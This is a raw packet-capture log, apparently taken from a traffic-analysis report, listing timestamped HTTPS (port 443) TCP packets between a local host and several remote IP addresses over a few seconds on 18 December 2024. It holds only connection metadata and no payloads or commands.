                                                                                                        Dec 18, 2024 23:16:51.296530008 CET44349752104.17.24.14192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.296803951 CET49752443192.168.2.4104.17.24.14
                                                                                                        Dec 18, 2024 23:16:51.302081108 CET44349752104.17.24.14192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.302396059 CET44349752104.17.24.14192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.302582979 CET49752443192.168.2.4104.17.24.14
                                                                                                        Dec 18, 2024 23:16:51.302582979 CET49752443192.168.2.4104.17.24.14
                                                                                                        Dec 18, 2024 23:16:51.308517933 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:51.308557987 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.309900999 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:51.311280966 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:51.311300993 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.340275049 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:51.340305090 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.340672970 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:51.340672970 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:51.340701103 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.341787100 CET49753443192.168.2.4151.101.194.137
                                                                                                        Dec 18, 2024 23:16:51.441658974 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.441690922 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.441732883 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.441754103 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.441777945 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.441875935 CET49753443192.168.2.4151.101.194.137
                                                                                                        Dec 18, 2024 23:16:51.441875935 CET49753443192.168.2.4151.101.194.137
                                                                                                        Dec 18, 2024 23:16:51.441906929 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.441936016 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.441967010 CET49753443192.168.2.4151.101.194.137
                                                                                                        Dec 18, 2024 23:16:51.442796946 CET49753443192.168.2.4151.101.194.137
                                                                                                        Dec 18, 2024 23:16:51.472449064 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.472476959 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.472505093 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.472522020 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.472542048 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.472560883 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.472606897 CET49753443192.168.2.4151.101.194.137
                                                                                                        Dec 18, 2024 23:16:51.472843885 CET49753443192.168.2.4151.101.194.137
                                                                                                        Dec 18, 2024 23:16:51.472858906 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.473136902 CET49753443192.168.2.4151.101.194.137
                                                                                                        Dec 18, 2024 23:16:51.504575014 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.504599094 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.504669905 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.504690886 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.504718065 CET49753443192.168.2.4151.101.194.137
                                                                                                        Dec 18, 2024 23:16:51.504719019 CET49753443192.168.2.4151.101.194.137
                                                                                                        Dec 18, 2024 23:16:51.504746914 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.504774094 CET49753443192.168.2.4151.101.194.137
                                                                                                        Dec 18, 2024 23:16:51.504795074 CET49753443192.168.2.4151.101.194.137
                                                                                                        Dec 18, 2024 23:16:51.504849911 CET49753443192.168.2.4151.101.194.137
                                                                                                        Dec 18, 2024 23:16:51.513504982 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.513678074 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.513726950 CET49753443192.168.2.4151.101.194.137
                                                                                                        Dec 18, 2024 23:16:51.515414953 CET49753443192.168.2.4151.101.194.137
                                                                                                        Dec 18, 2024 23:16:51.515430927 CET44349753151.101.194.137192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.515470982 CET49753443192.168.2.4151.101.194.137
                                                                                                        Dec 18, 2024 23:16:51.515535116 CET49753443192.168.2.4151.101.194.137
                                                                                                        Dec 18, 2024 23:16:51.605345964 CET49752443192.168.2.4104.17.24.14
                                                                                                        Dec 18, 2024 23:16:51.605380058 CET44349752104.17.24.14192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.531397104 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.556231022 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:52.556263924 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.560071945 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.560154915 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:52.560447931 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:52.560578108 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:52.560622931 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.572015047 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.578993082 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:52.579004049 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.582808971 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.582928896 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:52.583214998 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:52.583359003 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:52.583364010 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.583429098 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.604856014 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:52.604866028 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.635493040 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:52.635505915 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.650403023 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:52.682802916 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:52.974443913 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.974992037 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.975052118 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:52.975071907 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.975888014 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.975949049 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:52.975958109 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.976701975 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.976757050 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:52.976766109 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.982984066 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.983081102 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:52.983089924 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.999501944 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:52.999602079 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:52.999610901 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.013267994 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.013845921 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.013905048 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.013925076 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.021462917 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.021549940 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.021559000 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.029814005 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.029875994 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.029885054 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.038152933 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.038258076 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.038265944 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.041305065 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.042431116 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.042464972 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.042526007 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.042723894 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.042742014 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.087701082 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.087709904 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.094017982 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.135082006 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.135083914 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.135094881 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.135097027 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.170113087 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.170340061 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.170351028 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.179704905 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.179800987 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.179810047 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.183267117 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.183276892 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.187666893 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.187737942 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.187747002 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.195636988 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.195724964 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.195734978 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.203613997 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.203716993 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.203725100 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.209151983 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.209244013 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.209264040 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.211671114 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.211762905 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.211771965 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.219150066 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.219218016 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.219227076 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.220223904 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.220288038 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.220295906 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.227781057 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.227794886 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.227870941 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.227881908 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.227910995 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.227920055 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.235759974 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.235825062 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.235836029 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.236103058 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.236164093 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.236171961 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.236531973 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.236624002 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.236999035 CET49757443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.237013102 CET44349757104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.239130974 CET49760443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.239162922 CET44349760104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.239264011 CET49760443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.239777088 CET49760443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.239790916 CET44349760104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.248800993 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.248862982 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.248872042 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.254988909 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.255063057 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.255070925 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.295275927 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.358500004 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.358774900 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:53.358834028 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.358952999 CET49756443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:53.358969927 CET44349756104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.250901937 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.253448009 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.253473043 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.253776073 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.254137993 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.254192114 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.254293919 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.295337915 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.450122118 CET44349740142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.450268984 CET44349740142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.450344086 CET49740443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:16:54.460320950 CET44349760104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.460581064 CET49760443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.460592985 CET44349760104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.460879087 CET44349760104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.461184025 CET49760443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.461242914 CET44349760104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.461306095 CET49760443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.507369995 CET44349760104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.702012062 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.702141047 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.702219963 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.702285051 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.703527927 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.703598022 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.703614950 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.704238892 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.704305887 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.704318047 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.710408926 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.710510969 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.710522890 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.718755007 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.718847036 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.718859911 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.767188072 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.822449923 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.869692087 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.869709015 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.897387028 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.897511959 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.897526979 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.905405998 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.905529976 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.905543089 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.906666040 CET44349760104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.906718969 CET44349760104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.907582045 CET49760443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.907763958 CET49760443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.907777071 CET44349760104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.910463095 CET49740443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:16:54.910473108 CET44349740142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.910754919 CET49764443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.910815954 CET44349764104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.910944939 CET49764443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.911206007 CET49764443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.911236048 CET44349764104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.913369894 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.913444042 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.913456917 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.921318054 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.921379089 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.921391964 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.929490089 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.929582119 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.929594040 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.937521935 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.940515041 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.940534115 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.945441008 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.948457956 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.948474884 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.953452110 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.953517914 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.953546047 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.967685938 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.967763901 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.967776060 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.974328995 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.974421024 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.974430084 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.974450111 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.974520922 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.980804920 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.987425089 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:54.987528086 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:54.987540960 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.041446924 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.085279942 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.087430954 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.087496042 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.087511063 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.100296021 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.100411892 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.100425005 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.106967926 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.107075930 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.107088089 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.107202053 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.120112896 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.120134115 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.120218039 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.120233059 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.120312929 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.132977009 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.132998943 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.133053064 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.145745039 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.145946026 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.145961046 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.146086931 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.155679941 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.155699968 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.155802965 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.160630941 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.160743952 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.170295954 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.170371056 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.179330111 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.179425001 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.188915014 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.189016104 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.193619013 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.193721056 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.203119993 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.203250885 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.208103895 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.208228111 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.219805956 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.219913006 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.280464888 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.280539989 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.285206079 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.285284996 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.285298109 CET44349758104.18.95.41192.168.2.4
